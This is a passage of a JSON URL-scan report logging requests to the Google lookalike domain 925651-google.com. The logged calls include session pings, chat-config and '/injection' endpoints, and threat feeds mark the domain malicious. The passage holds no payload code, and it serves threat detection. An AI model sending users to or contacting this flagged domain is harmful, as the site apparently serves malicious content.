verity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null},{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/api/public/chat-config/2971296c-6950-44d8-96a4-527bbcd2f099","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://925651-google.com/","date":"2026-04-21T09:02:59.679Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"GET /api/public/chat-config/2971296c-6950-44d8-96a4-527bbcd2f099 HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 403 Forbidden\r\ncontent-length: 28\r\npriority: u=4,i=?0\r\ndate: Tue, 21 Apr 2026 09:02:59 GMT\r\ncontent-type: application/json; charset=utf-8\r\nx-xss-protection: 1; mode=block\r\ncf-ray: 9efb3686fa300883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"1c-nWcT8lAoCqDjrCJITDHkT+rfixY\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=9vfTeyF4tjyidrwDFE15Gevz0XEsldJcNM%2Baxx9esnsFt6t7xMS%2FGqmYF3NV%2FgAttFOSPxrOggdIamieIwmvgTZu1IGrG8B2neR8NUx%2BqyS%2FolfUT1SWtEODjoCOWyoQQ%2FCzzssU1EulCZFt%2BkSkHi8%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"403","status_text":"Forbidden","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":28,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text data","md5":"e3d57c361b5914c7a00f9b354d2cdf0f","sha1":"9d6713f250280aa0e3ac22484c31e44feadf8b16","sha256":"549a258bb3491836ef45f626a5508bd53857b9bf3212ebe35effa0839b0c07cb","sha512":"d77130401d4387a0886a3ad1b76cb8bae9fdf861807690ac4842845e8395ebc631d00373d3db728282cd3bb7ebe4e4f66a1c3fb92e6bb4e86778338596781543","ssdeep":"","tlshash":"bb80002fb8082e0803230003302020e2280000800b8823c3088a3008030c8028202200","first_seen":"2026-04-21T09:03:25.847616Z","last_seen":"2026-04-21T09:16:26.526865Z","times_seen":2,"resource_available":false,"data":null}},"time_used":104,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":104,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null},{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/api/public/session/ping","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://925651-google.com/","date":"2026-04-21T09:03:05.571Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"POST /api/public/session/ping HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nContent-Type: application/json\r\nContent-Length: 231\r\nOrigin: https://925651-google.com\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"POST","post_data":{"size":231,"data":"{\"id\":\"2971296c-6950-44d8-96a4-527bbcd2f099\",\"input\":{},\"page\":\"/\",\"domain\":\"925651-google.com\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\",\"_bs\":0,\"_ic\":0,\"_vs\":\"active\",\"_lf\":{}}"}},"response":{"raw":"HTTP/3 200 OK\r\nx-xss-protection: 1; mode=block\r\ncontent-encoding: br\r\ndate: Tue, 21 Apr 2026 09:03:05 GMT\r\ncontent-type: application/json; charset=utf-8\r\npriority: u=4,i=?0\r\ncf-ray: 9efb36abde9e0883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"42-LDTpsXpM+75nAuVC7n1bdN03Urw\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=%2B9C51yVXE3EKjlL08lZm1fgTRZa1GEPn7w76273T5twGoAq92VCdMRgJeMRn00D7eUd8oIP6L07gdNnGhNxnX0BQgHjDQtdNCEVLUt5YIOpn1osavCyPI8R72at2b3Taku3JDwFHHM51pnoA5Bm4Hsc%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":66,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text data","md5":"a825755e878073675a2be8cb3e5dd4ee","sha1":"2c34e9b17a4cfbbe6702e542ee7d5b74dd3752bc","sha256":"941d6623d85f364ca5cd02966c47a7e0b5d246ed67d1ec14bd3df90f2abe256c","sha512":"4bdd87c22ba777cae8b068da21b240d123ff665ce155941fc4d5f8dd014ae11da590b2c01e5d37e9c3816a6eb3c2754b5499dce9ac55cbc78f9b3f199c0f045d","ssdeep":"","tlshash":"56a00244d43c217924c49746156c2661ea9e9d7c71b7108149ed59240b109c6c6aca38","first_seen":"2026-04-21T09:03:25.850558Z","last_seen":"2026-04-21T09:03:25.850558Z","times_seen":1,"resource_available":false,"data":null}},"time_used":89,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":89,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null},{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/api/sessions/2971296c-6950-44d8-96a4-527bbcd2f099/injection","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://925651-google.com/","date":"2026-04-21T09:03:06.570Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"GET /api/sessions/2971296c-6950-44d8-96a4-527bbcd2f099/injection HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 403 Forbidden\r\ncontent-length: 28\r\npriority: u=4,i=?0\r\ndate: Tue, 21 Apr 2026 09:03:06 GMT\r\ncontent-type: application/json; charset=utf-8\r\nx-xss-protection: 1; mode=block\r\ncf-ray: 9efb36b20f860883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"1c-nWcT8lAoCqDjrCJITDHkT+rfixY\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=4qT2L03zkKxO2wRjy%2FDZGOOB%2FE2yI5ikXZvh9Y25s6kxzZu8b68K76QQ%2FyThW4ZpTZwW1p6oZeqtVuhoek40KNtJg8PzOoXyP8FXkK0ZwPm6QJ5769nA12fGGtIdcUDL00Z%2Bc2AomHxIPFpPuXhpYFk%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"403","status_text":"Forbidden","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":28,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text data","md5":"e3d57c361b5914c7a00f9b354d2cdf0f","sha1":"9d6713f250280aa0e3ac22484c31e44feadf8b16","sha256":"549a258bb3491836ef45f626a5508bd53857b9bf3212ebe35effa0839b0c07cb","sha512":"d77130401d4387a0886a3ad1b76cb8bae9fdf861807690ac4842845e8395ebc631d00373d3db728282cd3bb7ebe4e4f66a1c3fb92e6bb4e86778338596781543","ssdeep":"","tlshash":"bb80002fb8082e0803230003302020e2280000800b8823c3088a3008030c8028202200","first_seen":"2026-04-21T09:03:25.847616Z","last_seen":"2026-04-21T09:16:26.526865Z","times_seen":2,"resource_available":false,"data":null}},"time_used":104,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":104,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null},{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/api/sessions/2971296c-6950-44d8-96a4-527bbcd2f099/injection","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://925651-google.com/","date":"2026-04-21T09:03:09.571Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"GET /api/sessions/2971296c-6950-44d8-96a4-527bbcd2f099/injection HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 403 Forbidden\r\ncontent-length: 28\r\npriority: u=4,i=?0\r\ndate: Tue, 21 Apr 2026 09:03:09 GMT\r\ncontent-type: application/json; charset=utf-8\r\nx-xss-protection: 1; mode=block\r\ncf-ray: 9efb36c4da340883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"1c-nWcT8lAoCqDjrCJITDHkT+rfixY\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=%2BKQrK6tQIxWJv%2FxcSpTB00gP2kAHIVCjWzqZiJsic%2B3gB2ptdT8n07867xwOcRvggSxuhm%2FjsLKxqWCv%2B%2BIhqX5ZyE3%2FYNOvNLRZKBeizLVny8n2lm37hBjLxK1qAeGJeXQbEFjdmCUtj6XPo%2B%2FtjKM%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"403","status_text":"Forbidden","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":28,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text data","md5":"e3d57c361b5914c7a00f9b354d2cdf0f","sha1":"9d6713f250280aa0e3ac22484c31e44feadf8b16","sha256":"549a258bb3491836ef45f626a5508bd53857b9bf3212ebe35effa0839b0c07cb","sha512":"d77130401d4387a0886a3ad1b76cb8bae9fdf861807690ac4842845e8395ebc631d00373d3db728282cd3bb7ebe4e4f66a1c3fb92e6bb4e86778338596781543","ssdeep":"","tlshash":"bb80002fb8082e0803230003302020e2280000800b8823c3088a3008030c8028202200","first_seen":"2026-04-21T09:03:25.847616Z","last_seen":"2026-04-21T09:16:26.526865Z","times_seen":2,"resource_available":false,"data":null}},"time_used":110,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":110,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null},{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/fonts/GoogleSans-Regular.ttf","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"font","requested_by":"https://925651-google.com/","date":"2026-04-21T09:02:57.557Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"GET /fonts/GoogleSans-Regular.ttf HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nSec-Fetch-Dest: font\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 200 OK\r\nx-content-type-options: nosniff\r\ncontent-encoding: br\r\ndate: Tue, 21 Apr 2026 09:02:57 GMT\r\ncontent-type: font/ttf\r\nx-xss-protection: 1; mode=block\r\ncf-ray: 9efb3679b8900883-OSL\r\ncf-cache-status: MISS\r\npriority: u=4,i=?0\r\ncache-control: public, max-age=14400\r\nlast-modified: Tue, 21 Apr 2026 09:02:57 GMT\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=rehxGe%2FQjRMfnFXqYoN1usQMtAuRMwijmxi%2BwPdWkD%2BzH2GIpbi31KAOyHG5eL9mChPAiv47a42xAa5QvXMzwBTMHnWM3MGSWz8TuWgCY4MVPkbotuJYS5MrXl5FdJA3oT7coGNgrnSUHHswY67noZ4%3D\"}]}\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":119984,"size_decoded":0,"mime_type":"font/ttf","magic":"TrueType Font data, digitally signed, 14 tables, 1st \"DSIG\", 12 names, Microsoft, language 0x409, Copyright 2017 Google Inc. All Rights Reserved.Google SansRegular1.023;GOOG;GoogleSans-RegularGo","md5":"b5c77a6aed75cdad9489effd0d5ea411","sha1":"4974453e73089c1d8bcf2a6b5eeff51302da45ec","sha256":"974ee8402aed7391f8ed35155db12950697bcbbe3ad01abfb81718b65cb1960d","sha512":"31f53e9a2803bb42ca6dbc69cae9dbf9de53a91db9cb32bac6c6ab9d0350639a21a22b8c193badba4be8747f2a76c14c12333f6114c5150d1ca53f36b7f7b4b3","ssdeep":"1536:NVSyKxWDcIViZH+XcRF7U4QR8lY/f6GeG4AmDFXQPt:WyKMYH2IUVagl","tlshash":"46c31b41f6537b0deb236e3c56a2e3a19e78b029aa66c3cfb5455ff2f4de5410880706","first_seen":"2023-05-11T09:56:23Z","last_seen":"2026-04-21T09:16:26.528724Z","times_seen":174,"resource_available":false,"data":null}},"time_used":229,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":145,"receive":84,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null},{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/api/public/session/ping","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://925651-google.com/","date":"2026-04-21T09:02:59.570Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"POST /api/public/session/ping HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nContent-Type: application/json\r\nContent-Length: 231\r\nOrigin: https://925651-google.com\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"POST","post_data":{"size":231,"data":"{\"id\":\"2971296c-6950-44d8-96a4-527bbcd2f099\",\"input\":{},\"page\":\"/\",\"domain\":\"925651-google.com\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\",\"_bs\":0,\"_ic\":0,\"_vs\":\"active\",\"_lf\":{}}"}},"response":{"raw":"HTTP/3 200 OK\r\nx-xss-protection: 1; mode=block\r\ncontent-encoding: br\r\ndate: Tue, 21 Apr 2026 09:02:59 GMT\r\ncontent-type: application/json; charset=utf-8\r\npriority: u=4,i=?0\r\ncf-ray: 9efb36865a100883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"42-LDTpsXpM+75nAuVC7n1bdN03Urw\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=LvRQZwgtaQJ%2BzckBDm0AvVEjKyRAP2BONTBqJqLiA06OgxCAr6YyDIWwg6wedCIT5%2B3%2FOYqNiS6Y%2BJTP06hv7e4SwMMdB4OoJStdMKb0C5j9sh1c1YUVDh3Cb1yrIyXyYdeImv9fmH5kLaCOvlc3e%2BU%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":66,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text 